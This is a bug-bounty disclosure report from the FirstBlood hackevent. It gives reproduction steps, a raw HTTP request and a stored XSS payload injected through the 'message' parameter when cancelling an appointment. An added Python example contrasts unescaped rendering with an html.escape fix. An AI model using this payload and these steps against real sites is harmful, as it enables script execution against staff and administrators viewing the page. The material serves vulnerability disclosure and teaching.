FirstBlood-#202: Stored XSS leads to many things, entire site manipulation

On 2021-05-11, prob_hakz reported:


Stored XSS on cancelled.php endpoint


Create a report at the /book-appointment.html endpoint.

Now go to /yourappointments.php and give the UUID.

Now hit cancel on the request and intercept it.

Two POST parameters will be passed: act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3

Now add the message parameter and the payload like below:

act=cancel&id=b9f4b531-5b7a-4893-a849-ca3cc38b95f3&message="><script/src=//>

Now log in as admin or non-admin and go to the cancelled requests page to see the popup.

HTTP request:

POST /api/ma.php HTTP/1.1
Content-Length: 90
csrf: 99215d4e-0ff3-4275
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: beta=true; doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=28def95046e533dc234c1475c
Connection: close



Same as my previous report, it is non-admin to anyone, so it's a huge impact, as I mentioned in that report.
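The following is an added example, not code from the report or from the FirstBlood application. It reproduces the two halves of the finding offline: building the exact act=cancel&id=...&message=... body the report sends to /api/ma.php, and showing why the payload works when the stored message is rendered into an HTML attribute without escaping, next to the hardened rendering. The HTML template for the cancelled-appointments row (an input whose value holds the cancellation reason) is an assumption; the UUID and payload are the ones in the report. The HTMLParser-based check counts how many <script> start tags a parser sees, which is the difference between text that stays data and text that becomes markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Values taken from the report above; the page template below is constructed.
APPOINTMENT_ID = "b9f4b531-5b7a-4893-a849-ca3cc38b95f3"
PAYLOAD = '"><script/src=//>'


def build_cancel_body(appointment_id: str, message: str) -> str:
    """Form-encode the POST /api/ma.php body described in the report
    (act=cancel&id=<uuid>&message=<payload>), as a proxy would send it."""
    return urlencode({"act": "cancel", "id": appointment_id, "message": message})


def render_cancelled_row_vulnerable(message: str) -> str:
    """Assumed vulnerable rendering of one row on the cancelled page: the
    stored message is interpolated into a quoted attribute unescaped, so a
    message starting with '">' closes the attribute and the tag, and whatever
    follows is parsed as new markup."""
    return f'<tr><td><input class="reason" value="{message}"></td></tr>'


def render_cancelled_row_fixed(message: str) -> str:
    """Hardened rendering: html.escape(quote=True) encodes & < > " and ', so
    the message can never leave the attribute context."""
    safe = html.escape(message, quote=True)
    return f'<tr><td><input class="reason" value="{safe}"></td></tr>'


class _RowInspector(HTMLParser):
    """Record <script> start tags and the value of each reason input, the way
    a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.reason_values: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            for name, value in attrs:
                if name == "value":
                    self.reason_values.append(value or "")


def _inspect(markup: str) -> _RowInspector:
    p = _RowInspector()
    p.feed(markup)
    p.close()
    return p


def injected_script_count(markup: str) -> int:
    """Number of <script> elements the rendered row would create."""
    return _inspect(markup).script_tags


def stored_reasons(markup: str) -> list[str]:
    """Attribute values actually carried by the reason input(s)."""
    return _inspect(markup).reason_values


if __name__ == "__main__":
    print("POST body:", build_cancel_body(APPOINTMENT_ID, PAYLOAD))
    for label, render in (("vulnerable", render_cancelled_row_vulnerable),
                          ("fixed", render_cancelled_row_fixed)):
        row = render(PAYLOAD)
        print(f"{label}: {row}")
        print(f"  script tags: {injected_script_count(row)}, "
              f"reason values: {stored_reasons(row)}")
```

In the vulnerable rendering the parser sees an empty reason value followed by a new script element; in the fixed rendering it sees no script element and the reason input carries the original payload string as plain data, which is what an output-encoding fix on the cancelled page should achieve. Run the module directly to print both rows.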


Endpoint: /api/ma.php

Parameter: message

Payload: "><script/src=//>

FirstBlood ID: 8
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload in the message parameter that will execute against administrators/doctors viewing the cancelled appointments page.

Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.